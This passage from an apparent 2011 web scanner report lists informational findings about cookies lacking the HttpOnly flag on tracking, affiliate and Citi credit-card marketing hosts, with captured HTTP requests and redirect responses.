$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#s`D!!!!#=(BU+!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#slj!!!!#=#T_f!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#wUS!!!!,=(6V[!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sun, 16-Jun-2013 11:58:29 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Fri, 17 Jun 2011 11:58:29 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

10.15. http://as00.estara.com/fs/ruleaction.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/fs/ruleaction.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

fscookies=b64_Xc3BDoMwCIDht-G2BWih9NBnWbqtiTvYGa3v70FXybj9.QIQAIKQinec0IE6JEI-5GcrayOjjyXXd92mFOIdHIPG30gYGDHE2-hpa8IzvnOpR6gV7eKZqcsR1w7bHbYiVuTvz5TbayzXwd47; expires=Wed, 15-Jun-2016 12:03:40 GMT; path=/; domain=.estara.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.16. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 16-Jun-2013 11:59:07 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.17. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1308311946.60|1308311946.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; Domain=.addthis.com; Expires=Sun, 16-Jun-2013 11:59:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.18. http://citi.bridgetrack.com/usc/_bt_appredir.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_bt_appredir.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TPMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312896020; expires=Fri, 17-Jun-2011 17:15:56 GMT; path=/
CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=43153&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308312778&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIAS=0&VTILNK=0&SID=C626E9F2656E4606A21348462D13F6BA&VTIVEN=1805; expires=Sun, 17-Jul-2011 04:00:00 GMT; path=/
CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_bt_appredir.asp?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734&TID=17781 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308312772545; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312773218; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; CitiBT%5F9=VTIVEN=1805&SID=C626E9F2656E4606A21348462D13F6BA&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&TX=1308312778&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTITRF=43153&VTIPUB=705&VTI3PTY=&VTIEML=0; CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; ATC9=47125d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312778116

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:56 GMT
Location: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: TPMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312896020; expires=Fri, 17-Jun-2011 17:15:56 GMT; path=/
Set-Cookie: CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=43153&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308312778&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIAS=0&VTILNK=0&SID=C626E9F2656E4606A21348462D13F6BA&VTIVEN=1805; expires=Sun, 17-Jul-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
Date: Fri, 17 Jun 2011 12:14:55 GMT
Connection: close

10.19. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=43153&VTIPUB=705&TX=1308312846&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVEN=1805&SID=E757957DB08144938AD7A32A94698E09; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
ATC9=6235d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Ucc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312846129; expires=Fri, 17-Jun-2011 17:15:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308307241791; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308312772545; ATC9=49814d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312773218; CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=42944&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308312773&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIAS=0&VTILNK=0&SID=36CEB96C744948E481109575676DCE63&VTIVEN=1805; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:06 GMT
Location: http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=E757957DB08144938AD7A32A94698E09
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: PCCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: PXCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=43153&VTIPUB=705&TX=1308312846&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVEN=1805&SID=E757957DB08144938AD7A32A94698E09; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
Set-Cookie: ATC9=6235d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Ucc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312846129; expires=Fri, 17-Jun-2011 17:15:06 GMT; path=/
Date: Fri, 17 Jun 2011 12:14:06 GMT
Connection: close

10.20. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
ATC9=58386d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Pcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42944&VTIPUB=705&TX=1308312841&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIVEN=1805&SID=ADDC737F3B2E44C49AC3A2E84E0E6C9A; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312841117; expires=Fri, 17-Jun-2011 17:15:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308307241791; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308312772545; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; CitiBT%5F9=VTIVEN=1805&SID=36CEB96C744948E481109575676DCE63&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&TX=1308312773&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTITRF=42944&VTIPUB=705&VTI3PTY=&VTIEML=0; ATC9=49814d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312773218

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:01 GMT
Location: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529047&ProspectID=ADDC737F3B2E44C49AC3A2E84E0E6C9A
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: PCCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: PXCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
Set-Cookie: ATC9=58386d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Pcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42944&VTIPUB=705&TX=1308312841&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIVEN=1805&SID=ADDC737F3B2E44C49AC3A2E84E0E6C9A; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312841117; expires=Fri, 17-Jun-2011 17:15:00 GMT; path=/
Date: Fri, 17 Jun 2011 12:14:01 GMT
Connection: close

10.21. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 11:59:56 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A224261%3A1124cf812011e906cc17069a599054; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 11:59:56 GMT; Path=/
lsn_track=UmFuZG9tSVYRizqjZXnGQxDToyno5A9RBlx%2Fm1pnukrSaDAZFqlMAg5QwCbNuuMthrS4noYNoIWwbsKdQsozzg%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 11:59:56 GMT; Path=/
lsclick_mid1335="2011-06-17 11:59:56.312|EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 11:59:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.22. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 12:00:31 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A227478%3A1118b79220110c061317070b00ed04; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 12:00:31 GMT; Path=/
lsn_track=UmFuZG9tSVYkVQ7zZ50sMP6zzgyOXYFH4NxsDcK9L89L9V6GAZUtq7w%2Fv0c5e2Gg3c6Q8Ny5aiajimfEubz9lw%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 12:00:31 GMT; Path=/
lsclick_mid2291="2011-06-17 12:00:31.668|EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 12:00:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.23. http://creditcards.citicards.com/usc/_bt_appredir.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/_bt_appredir.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/_bt_appredir.asp?TID=17781&BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT=GUID=D1F4D666B48E4BCBA934AE2EE33EE2AA; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_DiamondPreferred_MC_21monthBTP%7C1308314708657%3B; CitiBT%5F9=; CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:15:08 GMT
Location: http://citi.bridgetrack.com/usc/_bt_appredir.asp?TID=17781&BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT%5F9=; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:15:07 GMT
Connection: close

10.24. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
